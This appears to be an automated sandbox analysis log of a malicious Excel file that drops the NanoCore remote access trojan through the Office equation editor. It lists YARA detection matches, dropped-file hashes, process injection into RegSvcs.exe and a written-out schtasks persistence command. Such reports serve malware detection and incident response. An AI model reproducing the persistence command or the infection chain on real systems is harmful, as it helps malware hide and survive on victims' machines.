        Source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: vbc.exe PID: 2488, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: vbc.exe PID: 2488, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.4b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.354fb0c.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.354fb0c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.504629.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.251dff4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.500000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.500000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.3554135.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F243E0 NtQueryInformationProcess,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F243D9 NtQueryInformationProcess,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_008243B0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082E3C8
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082A3F0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00820330
        Source: C:\Users\Public\vbc.exeCode function: 4_2_008274A8
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00825420
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00825758
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00827888
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00823BC0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00829C60
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082ADE9
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082BD10
        Source: C:\Users\Public\vbc.exeCode function: 4_2_008290B1
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082E20F
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082E210
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00824387
        Source: C:\Users\Public\vbc.exeCode function: 4_2_008243E5
        Source: C:\Users\Public\vbc.exeCode function: 4_2_008254D1
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082D70A
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082D718
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082A8A1
        Source: C:\Users\Public\vbc.exeCode function: 4_2_008209B8
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00829BC0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082CB49
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082CB58
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082BC10
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082DDA7
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082DDA8
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082DFA1
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0082DFB0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F2A0D0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F295F0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F24180
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F22960
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F29288
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F25BA8
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F24F9A
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F26058
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F20048
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F26049
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F20015
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F23990
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F23981
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F22952
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F23270
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00F25B98
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_002EB1F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_002E43A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_002EDE38
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_002EBEA8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_002E3788
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_002E4458
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_002EBF66
        Source: Files Specification.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exe 20E490AFBA639EA251A2F095A8B9B85E1B9922FF6D8B6F47CEB567BA62521A28
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exe 20E490AFBA639EA251A2F095A8B9B85E1B9922FF6D8B6F47CEB567BA62521A28
        Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 20E490AFBA639EA251A2F095A8B9B85E1B9922FF6D8B6F47CEB567BA62521A28
        Source: 00000007.00000002.2364697576.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2364697576.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: vbc.exe PID: 2488, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: vbc.exe PID: 2488, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.4b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.4b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.RegSvcs.exe.354fb0c.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.354fb0c.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.RegSvcs.exe.354fb0c.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.354fb0c.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.504629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.504629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.RegSvcs.exe.251dff4.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.251dff4.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.RegSvcs.exe.500000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.500000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.500000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.500000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.3554135.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.3554135.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@1/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Files Specification.xlsxJump to behavior
        Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\KQdgwQc
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f57d5a77-8670-45ef-b736-5f3a07b68725}
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE8C8.tmpJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................h.......(.P.....................@.........................................................................*.....
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: Files Specification.xlsxStatic file information: File size 2326528 > 1048576
